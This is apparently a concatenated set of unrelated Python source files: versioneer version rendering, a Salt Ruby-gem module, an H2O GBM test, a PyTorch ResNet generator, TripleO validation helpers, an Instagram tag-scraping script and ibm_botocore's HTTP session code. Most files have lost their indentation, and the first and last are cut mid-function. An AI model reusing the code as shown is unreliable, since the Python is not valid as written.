full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[: git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r"^(.+)-(\d+)-g([0-9a-f]+)$", git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = "unable to parse git-describe output: '%s'" % describe_out
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = "tag '%s' doesn't start with prefix '%s'" % (
full_tag,
tag_prefix,
)
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix) :]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"], cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"], cwd=root)[
0
].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
    Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
    Like 'git describe --tags --dirty --always --long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {
"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None,
}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {
"version": rendered,
"full-revisionid": pieces["long"],
"dirty": pieces["dirty"],
"error": None,
"date": pieces.get("date"),
}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix, verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split("/"):
root = os.path.dirname(root)
except NameError:
return {
"version": "0+unknown",
"full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None,
}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {
"version": "0+unknown",
"full-revisionid": None,
"dirty": None,
"error": "unable to compute version",
"date": None,
}
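# --- Illustrative usage sketch (assumption: the __main__ guard below is not
# part of the generated versioneer file) ---
# get_versions() returns a dict with "version", "full-revisionid", "dirty",
# "error" and "date" keys; this just prints a few of them.
if __name__ == "__main__":
    info = get_versions()
    print("version: %s" % info["version"])
    print("full revision: %s" % info["full-revisionid"])
    print("dirty: %s" % info["dirty"])
    print("error: %s" % info["error"])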
|
the-stack_106_15893
|
'''
Manage ruby gems.
'''
# Import python libs
import re
def _gem(command, ruby=None, runas=None):
cmdline = 'gem {command}'.format(command=command)
if __salt__['rvm.is_installed']():
return __salt__['rvm.do'](ruby, cmdline, runas=runas)
ret = __salt__['cmd.run_all'](
cmdline,
runas=runas
)
if ret['retcode'] == 0:
return ret['stdout']
else:
return False
def install(gems, ruby=None, runas=None, version=None, rdoc=False, ri=False):
'''
Installs one or several gems.
gems
The gems to install.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
version : None
Specify the version to install for the gem.
Doesn't play nice with multiple gems at once
rdoc : False
Generate RDoc documentation for the gem(s).
ri : False
Generate RI documentation for the gem(s).
'''
options = ''
if version:
options += ' --version {0}'.format(version)
if not rdoc:
options += ' --no-rdoc'
if not ri:
options += ' --no-ri'
return _gem('install {gems} {options}'.format(gems=gems, options=options), ruby, runas=runas)
def uninstall(gems, ruby=None, runas=None):
'''
Uninstall one or several gems.
gems
The gems to uninstall.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
'''
return _gem('uninstall {gems}'.format(gems=gems), ruby, runas=runas)
def update(gems, ruby=None, runas=None):
'''
Update one or several gems.
gems
The gems to update.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
'''
return _gem('update {gems}'.format(gems=gems), ruby, runas=runas)
def update_system(version='', ruby=None, runas=None):
'''
Update rubygems.
version : (newest)
The version of rubygems to install.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
'''
return _gem('update --system {version}'.
format(version=version), ruby, runas=runas)
def list(prefix='', ruby=None, runas=None):
'''
List locally installed gems.
prefix :
Only list gems when the name matches this prefix.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
'''
gems = {}
stdout = _gem('list {prefix}'.format(prefix=prefix),
ruby, runas=runas)
lines = []
if isinstance(stdout, str):
lines = stdout.splitlines()
for line in lines:
        m = re.match(r'^([^ ]+) \((.+)\)', line)
if m:
gem = m.group(1)
versions = m.group(2).split(', ')
gems[gem] = versions
return gems
def sources_add(source_uri, ruby=None, runas=None):
'''
Add a gem source.
source_uri
The source URI to add.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
'''
return _gem('sources --add {source_uri}'.
format(source_uri=source_uri), ruby, runas=runas)
def sources_remove(source_uri, ruby=None, runas=None):
'''
Remove a gem source.
source_uri
The source URI to remove.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
'''
return _gem('sources --remove {source_uri}'.
format(source_uri=source_uri), ruby, runas=runas)
def sources_list(ruby=None, runas=None):
'''
List the configured gem sources.
ruby : None
If RVM is installed, the ruby version and gemset to use.
runas : None
The user to run gem as.
'''
return _gem('sources', ruby, runas=runas).splitlines()[2:]
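# --- Illustrative sketch (assumption: this __main__ block is not part of the
# original Salt module) ---
# list() parses ``gem list`` output with the regex used above; this demo runs
# that parsing on a hypothetical sample, since calling _gem() for real requires
# a Salt environment with __salt__ injected.
if __name__ == '__main__':
    sample = 'rake (10.1.0, 0.9.6)\nbundler (1.5.3)'
    parsed = {}
    for line in sample.splitlines():
        m = re.match(r'^([^ ]+) \((.+)\)', line)
        if m:
            parsed[m.group(1)] = m.group(2).split(', ')
    print(parsed)  # {'rake': ['10.1.0', '0.9.6'], 'bundler': ['1.5.3']}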
|
the-stack_106_15894
|
import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.gbm import H2OGradientBoostingEstimator
def distribution_behavior_gbm():
eco = h2o.import_file(path=pyunit_utils.locate("smalldata/gbm_test/ecology_model.csv"))
# 0/1 response: expect gaussian
eco_model = H2OGradientBoostingEstimator()
eco_model.train(x=range(2,13), y="Angaus", training_frame=eco)
# more than 2 integers for response: expect gaussian
cars = h2o.import_file(path=pyunit_utils.locate("smalldata/junit/cars.csv"))
cars_model = H2OGradientBoostingEstimator()
cars_model.train(x=range(3,7),y="cylinders", training_frame=cars)
# 0/1 response: expect gaussian
eco_model = H2OGradientBoostingEstimator(distribution="gaussian")
eco_model.train(x=range(2,13), y="Angaus", training_frame=eco)
# character response: expect error
try:
eco_model.train(x=range(1,8), y="Method", training_frame=eco)
assert False, "expected an error"
except EnvironmentError:
assert True
# 0/1 response: expect bernoulli
eco_model = H2OGradientBoostingEstimator(distribution="bernoulli")
eco["Angaus"] = eco["Angaus"].asfactor()
eco_model.train(x=range(2,13), y="Angaus", training_frame=eco)
# 2 level character response: expect bernoulli
tree = h2o.import_file(path=pyunit_utils.locate("smalldata/junit/test_tree_minmax.csv"))
tree_model=eco_model
tree_model.min_rows = 1
tree_model.train(range(3),y="response",training_frame=tree)
# more than two integers for response: expect error
try:
cars_mod = H2OGradientBoostingEstimator(distribution="bernoulli")
cars_mod.train(x=range(3,7), y="cylinders", training_frame=cars)
assert False, "expected an error"
except EnvironmentError:
assert True
# more than two character levels for response: expect error
try:
eco_model = H2OGradientBoostingEstimator(distribution="bernoulli")
eco_model.train(x=range(8), y="Method", training_frame=eco)
assert False, "expected an error"
except EnvironmentError:
assert True
#Log.info("==============================")
#Log.info("Multinomial Behavior")
#Log.info("==============================")
# more than two integers for response: expect multinomial
cars["cylinders"] = cars["cylinders"].asfactor()
cars_model = H2OGradientBoostingEstimator(distribution="multinomial")
cars_model.train(range(3,7), y="cylinders", training_frame=cars)
cars_model = H2OGradientBoostingEstimator(distribution="multinomial")
cars_model.train(x=range(3,7), y="cylinders", training_frame=cars)
# more than two character levels for response: expect multinomial
eco_model = H2OGradientBoostingEstimator(distribution="multinomial")
eco_model.train(x=range(8), y="Method", training_frame=eco)
if __name__ == "__main__":
pyunit_utils.standalone_test(distribution_behavior_gbm)
else:
distribution_behavior_gbm()
|
the-stack_106_15895
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import init
from models.generators.resblocks import Block
class ResNetGenerator(nn.Module):
"""Generator generates 64x64."""
def __init__(self, num_features=64, dim_z=128, bottom_width=4,
activation=F.relu, num_classes=0, distribution='normal'):
super(ResNetGenerator, self).__init__()
self.num_features = num_features
self.dim_z = dim_z
self.bottom_width = bottom_width
self.activation = activation
self.num_classes = num_classes
self.distribution = distribution
self.l1 = nn.Linear(dim_z, 16 * num_features * bottom_width ** 2)
self.block2 = Block(num_features * 16, num_features * 8,
activation=activation, upsample=True,
num_classes=num_classes)
self.block3 = Block(num_features * 8, num_features * 4,
activation=activation, upsample=True,
num_classes=num_classes)
self.block4 = Block(num_features * 4, num_features * 2,
activation=activation, upsample=True,
num_classes=num_classes)
self.block5 = Block(num_features * 2, num_features,
activation=activation, upsample=True,
num_classes=num_classes)
self.b6 = nn.BatchNorm2d(num_features)
self.conv6 = nn.Conv2d(num_features, 3, 1, 1)
def _initialize(self):
        init.xavier_uniform_(self.l1.weight)
        # the output convolution is named conv6 in __init__ (there is no conv7)
        init.xavier_uniform_(self.conv6.weight)
def forward(self, z, y=None, **kwargs):
h = self.l1(z).view(z.size(0), -1, self.bottom_width, self.bottom_width)
for i in range(2, 6):
h = getattr(self, 'block{}'.format(i))(h, y, **kwargs)
h = self.activation(self.b6(h))
return torch.tanh(self.conv6(h))
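# --- Illustrative usage sketch (assumption: this block is not from the original
# repository) ---
# Sample a batch of latent vectors of size dim_z and map them to 64x64 RGB
# images in [-1, 1]; with num_classes > 0 the blocks would additionally take
# integer class labels y.
if __name__ == '__main__':
    gen = ResNetGenerator(num_features=64, dim_z=128)
    z = torch.randn(4, 128)   # batch of 4 latent vectors
    fake = gen(z)             # expected shape: (4, 3, 64, 64)
    print(fake.shape)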
|
the-stack_106_15896
|
# Copyright 2016 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import glob
import logging
import os
import re
import tempfile
import yaml
from oslo_concurrency import processutils
from tripleo_workflows import constants
LOG = logging.getLogger(__name__)
DEFAULT_METADATA = {
'name': 'Unnamed',
'description': 'No description',
'stage': 'No stage',
'groups': [],
}
def get_validation_metadata(validation, key):
try:
return validation[0]['vars']['metadata'][key]
except KeyError:
return DEFAULT_METADATA.get(key)
except TypeError:
LOG.exception("Failed to get validation metadata.")
def load_validations(groups=None):
'''Loads all validations.'''
paths = glob.glob('{}/*.yaml'.format(constants.DEFAULT_VALIDATIONS_PATH))
results = []
for validation_path in sorted(paths):
with open(validation_path) as f:
validation = yaml.safe_load(f.read())
validation_groups = get_validation_metadata(validation, 'groups') \
or []
if not groups or \
set.intersection(set(groups), set(validation_groups)):
results.append({
'id': os.path.splitext(
os.path.basename(validation_path))[0],
'name': get_validation_metadata(validation, 'name'),
'groups': get_validation_metadata(validation, 'groups'),
'description': get_validation_metadata(validation,
'description'),
'metadata': get_remaining_metadata(validation)
})
return results
def get_remaining_metadata(validation):
try:
return {k: v for k, v in validation[0]['vars']['metadata'].items()
if k not in ['name', 'description', 'groups']}
except KeyError:
return dict()
def find_validation(validation):
return '{}/{}.yaml'.format(constants.DEFAULT_VALIDATIONS_PATH, validation)
def run_validation(validation, identity_file, plan, context):
return processutils.execute(
'/usr/bin/sudo', '-u', 'validations',
'OS_AUTH_URL={}'.format(context.auth_uri),
'OS_USERNAME={}'.format(context.user_name),
'OS_AUTH_TOKEN={}'.format(context.auth_token),
'OS_TENANT_NAME={}'.format(context.project_name),
'/usr/bin/run-validation',
find_validation(validation),
identity_file,
plan
)
def write_identity_file(key):
"""Write the SSH private key to disk"""
fd, path = tempfile.mkstemp(prefix='validations_identity_')
LOG.debug('Writing SSH key to disk at %s', path)
with os.fdopen(fd, 'w') as tmp:
tmp.write(key)
processutils.execute('/usr/bin/sudo', '/usr/bin/chown', '-h',
'validations:', path)
return path
def cleanup_identity_file(path):
"""Remove the SSH private key from disk"""
LOG.debug('Cleaning up identity file at %s', path)
processutils.execute('/usr/bin/sudo', '/usr/bin/rm', '-f', path)
def pattern_validator(pattern, value):
LOG.debug('Validating %s with pattern %s', value, pattern)
if not re.match(pattern, value):
return False
return True
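# --- Illustrative sketch (assumption: this __main__ block is not part of the
# TripleO module) ---
# Exercises the two pure helpers on in-memory data: metadata lookup falls back
# to DEFAULT_METADATA for missing keys, and pattern_validator is a thin
# re.match wrapper. No validations directory or Mistral context is required.
if __name__ == '__main__':
    validation = [{'vars': {'metadata': {'name': 'Check NTP',
                                         'groups': ['pre-deployment']}}}]
    print(get_validation_metadata(validation, 'name'))         # Check NTP
    print(get_validation_metadata(validation, 'description'))  # No description
    print(pattern_validator(r'^\d+$', '12345'))                # True
    print(pattern_validator(r'^\d+$', 'abc'))                  # False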
|
the-stack_106_15899
|
import os
from instauto.api.client import ApiClient
from instauto.api.actions import post as ps
from instauto.api.actions import search as se
if __name__ == '__main__':
if os.path.isfile('./.instauto.save'):
client = ApiClient.initiate_from_file('./.instauto.save')
else:
client = ApiClient(username=os.environ.get("INSTAUTO_USER") or "your_username", password=os.environ.get("INSTAUTO_PASS") or "your_password")
client.log_in()
client.save_to_disk('./.instauto.save')
s = se.Tag('instagram', 1)
resp = client.search_tag(s).json()
results = resp['results'][0]
tag_name = results['name']
rbt = ps.RetrieveByTag(tag_name)
obj, result = client.post_retrieve_by_tag(rbt)
retrieved_items = []
# retrieve the first 20 posts
while result and len(retrieved_items) < 20:
retrieved_items.extend(result)
obj, result = client.post_retrieve_by_tag(obj)
print(f"Retrieved {len(result)} new posts!")
print(f"Retrieved a total of {len(retrieved_items)} posts!")
|
the-stack_106_15900
|
import sys
import traceback
from typing import Any
import discord
from discord.ext import commands
from discord.ext.commands import errors
import bot_config
import errors as cerrors
import functions
class Logging(commands.Cog):
"""Handle logging stuff"""
def __init__(
self,
bot: commands.Bot
) -> None:
self.bot = bot
@commands.Cog.listener()
async def on_guild_join(
self,
guild: discord.Guild
) -> None:
support_server = self.bot.get_guild(
bot_config.SUPPORT_SERVER_ID
)
log_channel = discord.utils.get(
support_server.channels,
id=bot_config.SERVER_LOG_ID
)
members = guild.member_count
total = 0
for g in self.bot.guilds:
try:
total += g.member_count
except AttributeError:
pass
embed = discord.Embed(
description=f"Joined **{guild.name}**!\n"
f"**{members}** Members",
color=bot_config.GUILD_JOIN_COLOR
)
embed.set_footer(
text=f"We now have {len(self.bot.guilds)} servers and "
f"{total} users"
)
await log_channel.send(embed=embed)
@commands.Cog.listener()
async def on_guild_remove(
self,
guild: discord.Guild
) -> None:
support_server = self.bot.get_guild(
bot_config.SUPPORT_SERVER_ID
)
log_channel = discord.utils.get(
support_server.channels,
id=bot_config.SERVER_LOG_ID
)
members = guild.member_count
total = 0
for g in self.bot.guilds:
try:
total += g.member_count
except AttributeError:
pass
embed = discord.Embed(
description=f"Left **{guild.name}**.\n"
f"**{members}** Members",
color=bot_config.GUILD_LEAVE_COLOR
)
embed.set_footer(
text=f"We now have {len(self.bot.guilds)} servers and "
f"{total} users"
)
await log_channel.send(embed=embed)
@commands.Cog.listener()
async def on_error(
self,
event: Any,
*args: list,
**kwargs: dict
) -> None:
owner = self.bot.get_user(bot_config.OWNER_ID)
await owner.send(
f"Error on event {event} with args {args} and \
kwargs {kwargs}\n\n```{traceback.format_exc()}```"
)
@commands.Cog.listener()
async def on_command_error(
self,
ctx: commands.Context,
error: Exception,
force: bool = False
) -> None:
if hasattr(ctx.command, 'on_error') and not force:
return
try:
error = error.original
except Exception:
pass
if type(error) is discord.ext.commands.errors.CommandNotFound:
return
elif type(error) in [
cerrors.BotNeedsPerms, cerrors.DoesNotExist,
cerrors.NoPremiumError, cerrors.AlreadyExists,
cerrors.InvalidArgument, cerrors.NotEnoughCredits
]:
pass
elif type(error) in [
errors.BadArgument, errors.MissingRequiredArgument,
errors.NoPrivateMessage, errors.MissingPermissions,
errors.NotOwner, errors.CommandOnCooldown,
errors.ChannelNotFound, errors.BadUnionArgument,
errors.BotMissingPermissions, errors.UserNotFound,
errors.MemberNotFound, discord.InvalidArgument,
errors.RoleNotFound
]:
pass
elif type(error) is discord.ext.commands.errors.MaxConcurrencyReached:
pass
elif type(error) is ValueError:
pass
elif type(error) is discord.errors.Forbidden:
error = "I don't have the permissions to do that!"
elif type(error) is discord.http.Forbidden:
error = "I don't have the permissions to do that!"
else:
embed = discord.Embed(
title="Hmmm...",
description=(
"Something went wrong while running that command. "
"The error has been reported, and we will fix it "
"as soon as we can."
),
color=bot_config.ERROR_COLOR
)
tb = ''.join(traceback.format_tb(error.__traceback__))
context = (
f"Command: {ctx.command}\nArgs: {ctx.args} "
f"\nKwargs: {ctx.kwargs}"
)
embed.add_field(
name=f"{error.__class__.__name__}",
value=str(error)
)
await ctx.send(embed=embed)
full_strings = (
f"{type(error)}: {error}\n\n"
f"{context}\n\n"
f"```\n{tb}\n```"
).split('\n')
p = commands.Paginator(prefix='', suffix='')
for s in full_strings:
p.add_line(line=s)
for page in p.pages:
await functions.alert_owner(ctx.bot, page)
return
try:
await ctx.send(f"{error}")
except discord.errors.Forbidden:
await ctx.message.author.send(
"I don't have permission to send messages in "
f"{ctx.channel.mention}, so I can't respond "
"to your command!"
)
def setup(
bot: commands.Bot
) -> None:
bot.add_cog(Logging(bot))
|
the-stack_106_15904
|
import os.path
import logging
import socket
from base64 import b64encode
from urllib3 import PoolManager, ProxyManager, proxy_from_url, Timeout
from urllib3.util.retry import Retry
from urllib3.util.ssl_ import (
ssl, OP_NO_SSLv2, OP_NO_SSLv3, OP_NO_COMPRESSION, DEFAULT_CIPHERS,
)
from urllib3.exceptions import SSLError as URLLib3SSLError
from urllib3.exceptions import ReadTimeoutError as URLLib3ReadTimeoutError
from urllib3.exceptions import ConnectTimeoutError as URLLib3ConnectTimeoutError
from urllib3.exceptions import NewConnectionError, ProtocolError, ProxyError
try:
# Always import the original SSLContext, even if it has been patched
from urllib3.contrib.pyopenssl import orig_util_SSLContext as SSLContext
except ImportError:
from urllib3.util.ssl_ import SSLContext
import ibm_botocore.awsrequest
from ibm_botocore.vendored import six
from ibm_botocore.vendored.six.moves.urllib_parse import unquote
from ibm_botocore.compat import filter_ssl_warnings, urlparse
from ibm_botocore.exceptions import (
ConnectionClosedError, EndpointConnectionError, HTTPClientError,
ReadTimeoutError, ProxyConnectionError, ConnectTimeoutError, SSLError
)
filter_ssl_warnings()
logger = logging.getLogger(__name__)
DEFAULT_TIMEOUT = 60
MAX_POOL_CONNECTIONS = 10
DEFAULT_CA_BUNDLE = os.path.join(os.path.dirname(__file__), 'cacert.pem')
try:
from certifi import where
except ImportError:
def where():
return DEFAULT_CA_BUNDLE
def get_cert_path(verify):
if verify is not True:
return verify
return where()
def create_urllib3_context(ssl_version=None, cert_reqs=None,
options=None, ciphers=None):
""" This function is a vendored version of the same function in urllib3
We vendor this function to ensure that the SSL contexts we construct
always use the std lib SSLContext instead of pyopenssl.
"""
context = SSLContext(ssl_version or ssl.PROTOCOL_SSLv23)
# Setting the default here, as we may have no ssl module on import
cert_reqs = ssl.CERT_REQUIRED if cert_reqs is None else cert_reqs
if options is None:
options = 0
# SSLv2 is easily broken and is considered harmful and dangerous
options |= OP_NO_SSLv2
# SSLv3 has several problems and is now dangerous
options |= OP_NO_SSLv3
# Disable compression to prevent CRIME attacks for OpenSSL 1.0+
# (issue urllib3#309)
options |= OP_NO_COMPRESSION
context.options |= options
if getattr(context, 'supports_set_ciphers', True):
# Platform-specific: Python 2.6
context.set_ciphers(ciphers or DEFAULT_CIPHERS)
context.verify_mode = cert_reqs
if getattr(context, 'check_hostname', None) is not None:
# Platform-specific: Python 3.2
# We do our own verification, including fingerprints and alternative
# hostnames. So disable it here
context.check_hostname = False
return context
class ProxyConfiguration(object):
"""Represents a proxy configuration dictionary.
This class represents a proxy configuration dictionary and provides utility
    functions to retrieve well structured proxy urls and proxy headers from the
proxy configuration dictionary.
"""
def __init__(self, proxies=None):
if proxies is None:
proxies = {}
self._proxies = proxies
def proxy_url_for(self, url):
"""Retrieves the corresponding proxy url for a given url. """
parsed_url = urlparse(url)
proxy = self._proxies.get(parsed_url.scheme)
if proxy:
proxy = self._fix_proxy_url(proxy)
return proxy
def proxy_headers_for(self, proxy_url):
"""Retrieves the corresponding proxy headers for a given proxy url. """
headers = {}
username, password = self._get_auth_from_url(proxy_url)
if username and password:
basic_auth = self._construct_basic_auth(username, password)
headers['Proxy-Authorization'] = basic_auth
return headers
def _fix_proxy_url(self, proxy_url):
if proxy_url.startswith('http:') or proxy_url.startswith('https:'):
return proxy_url
elif proxy_url.startswith('//'):
return 'http:' + proxy_url
else:
return 'http://' + proxy_url
def _construct_basic_auth(self, username, password):
auth_str = '{0}:{1}'.format(username, password)
encoded_str = b64encode(auth_str.encode('ascii')).strip().decode()
return 'Basic {0}'.format(encoded_str)
def _get_auth_from_url(self, url):
parsed_url = urlparse(url)
try:
return unquote(parsed_url.username), unquote(parsed_url.password)
except (AttributeError, TypeError):
return None, None
class URLLib3Session(object):
"""A basic HTTP client that supports connection pooling and proxies.
This class is inspired by requests.adapters.HTTPAdapter, but has been
boiled down to meet the use cases needed by ibm_botocore. For the most part
    this class matches the functionality of HTTPAdapter in requests v2.7.0
(the same as our vendored version). The only major difference of note is
that we currently do not support sending chunked requests. While requests
    v2.7.0 implemented this themselves, later versions of urllib3 support this
directly via a flag to urlopen so enabling it if needed should be trivial.
"""
def __init__(self,
verify=True,
proxies=None,
timeout=None,
max_pool_connections=MAX_POOL_CONNECTIONS,
socket_options=None,
client_cert=None,
):
self._verify = verify
self._proxy_config = ProxyConfiguration(proxies=proxies)
self._pool_classes_by_scheme = {
'http': ibm_botocore.awsrequest.AWSHTTPConnectionPool,
'https': ibm_botocore.awsrequest.AWSHTTPSConnectionPool,
}
if timeout is None:
timeout = DEFAULT_TIMEOUT
if not isinstance(timeout, (int, float)):
timeout = Timeout(connect=timeout[0], read=timeout[1])
self._cert_file = None
self._key_file = None
if isinstance(client_cert, str):
self._cert_file = client_cert
elif isinstance(client_cert, tuple):
self._cert_file, self._key_file = client_cert
self._timeout = timeout
self._max_pool_connections = max_pool_connections
self._socket_options = socket_options
if socket_options is None:
self._socket_options = []
self._proxy_managers = {}
self._manager = PoolManager(**self._get_pool_manager_kwargs())
self._manager.pool_classes_by_scheme = self._pool_classes_by_scheme
def _get_pool_manager_kwargs(self, **extra_kwargs):
pool_manager_kwargs = {
'strict': True,
'timeout': self._timeout,
'maxsize': self._max_pool_connections,
'ssl_context': self._get_ssl_context(),
'socket_options': self._socket_options,
'cert_file': self._cert_file,
'key_file': self._key_file,
}
pool_manager_kwargs.update(**extra_kwargs)
return pool_manager_kwargs
def _get_ssl_context(self):
return create_urllib3_context()
def _get_proxy_manager(self, proxy_url):
if proxy_url not in self._proxy_managers:
proxy_headers = self._proxy_config.proxy_headers_for(proxy_url)
proxy_manager_kwargs = self._get_pool_manager_kwargs(
proxy_headers=proxy_headers)
proxy_manager = proxy_from_url(proxy_url, **proxy_manager_kwargs)
proxy_manager.pool_classes_by_scheme = self._pool_classes_by_scheme
self._proxy_managers[proxy_url] = proxy_manager
return self._proxy_managers[proxy_url]
def _path_url(self, url):
parsed_url = urlparse(url)
path = parsed_url.path
if not path:
path = '/'
if parsed_url.query:
path = path + '?' + parsed_url.query
return path
def _setup_ssl_cert(self, conn, url, verify):
if url.lower().startswith('https') and verify:
conn.cert_reqs = 'CERT_REQUIRED'
conn.ca_certs = get_cert_path(verify)
else:
conn.cert_reqs = 'CERT_NONE'
conn.ca_certs = None
def _get_connection_manager(self, url, proxy_url=None):
if proxy_url:
manager = self._get_proxy_manager(proxy_url)
else:
manager = self._manager
return manager
def _get_request_target(self, url, proxy_url):
if proxy_url and url.startswith('http:'):
# HTTP proxies expect the request_target to be the absolute url to
# know which host to establish a connection to
return url
else:
# otherwise just set the request target to the url path
return self._path_url(url)
def _chunked(self, headers):
return headers.get('Transfer-Encoding', '') == 'chunked'
def send(self, request):
try:
proxy_url = self._proxy_config.proxy_url_for(request.url)
manager = self._get_connection_manager(request.url, proxy_url)
conn = manager.connection_from_url(request.url)
self._setup_ssl_cert(conn, request.url, self._verify)
request_target = self._get_request_target(request.url, proxy_url)
urllib_response = conn.urlopen(
method=request.method,
url=request_target,
body=request.body,
headers=request.headers,
retries=Retry(False),
assert_same_host=False,
preload_content=False,
decode_content=False,
chunked=self._chunked(request.headers),
)
http_response = ibm_botocore.awsrequest.AWSResponse(
request.url,
urllib_response.status,
urllib_response.headers,
urllib_response,
)
if not request.stream_output:
# Cause the raw stream to be exhausted immediately. We do it
